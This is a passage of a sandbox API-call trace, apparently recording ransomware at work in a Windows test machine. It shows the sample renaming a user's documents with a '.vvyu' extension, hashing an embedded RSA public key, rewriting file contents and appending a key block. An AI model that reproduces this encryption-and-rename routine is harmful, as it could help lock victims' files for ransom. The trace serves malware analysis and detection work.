(lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Es4lP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\es4lp.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Es4lP.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\es4lp.pptx.vvyu")) returned 1 [0184.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.665] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.669] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528ed6d0, ftCreationTime.dwHighDateTime=0x1d89288, ftLastAccessTime.dwLowDateTime=0xd2738d10, ftLastAccessTime.dwHighDateTime=0x1d8a68c, ftLastWriteTime.dwLowDateTime=0xd2738d10, ftLastWriteTime.dwHighDateTime=0x1d8a68c, nFileSizeHigh=0x0, nFileSizeLow=0x9f0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HStSZLrr9ZV1_V.xlsx", cAlternateFileName="HSTSZL~1.XLS")) returned 1 [0184.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31528 [0184.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31528 | out: hHeap=0x6a0000) returned 1 [0184.669] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\HStSZLrr9ZV1_V.xlsx") returned=".xlsx" [0184.669] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\HStSZLrr9ZV1_V.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hstszlrr9zv1_v.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.670] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=40715) returned 1 [0184.671] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.674] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9ee5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.674] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.676] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.676] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x9f0b, lpOverlapped=0x0) returned 1 [0184.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.677] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.678] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.678] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.678] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.679] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.679] GetLastError () returned 0x0 [0184.679] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.679] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.679] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.679] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.679] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9f10) returned 0x2d43778 [0184.680] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31528 [0184.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31570 [0184.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.681] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9d8 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e9c0 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.685] GetCurrentThreadId () returned 0x264 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36dd8 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.686] GetCurrentThreadId () returned 0x264 [0184.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9d8 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea38 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea50 [0184.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9f0 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9c0 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31570 | out: hHeap=0x6a0000) returned 1 [0184.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.696] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x9f06, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x9f06, lpOverlapped=0x0) returned 1 [0184.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.697] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9f0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.697] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, 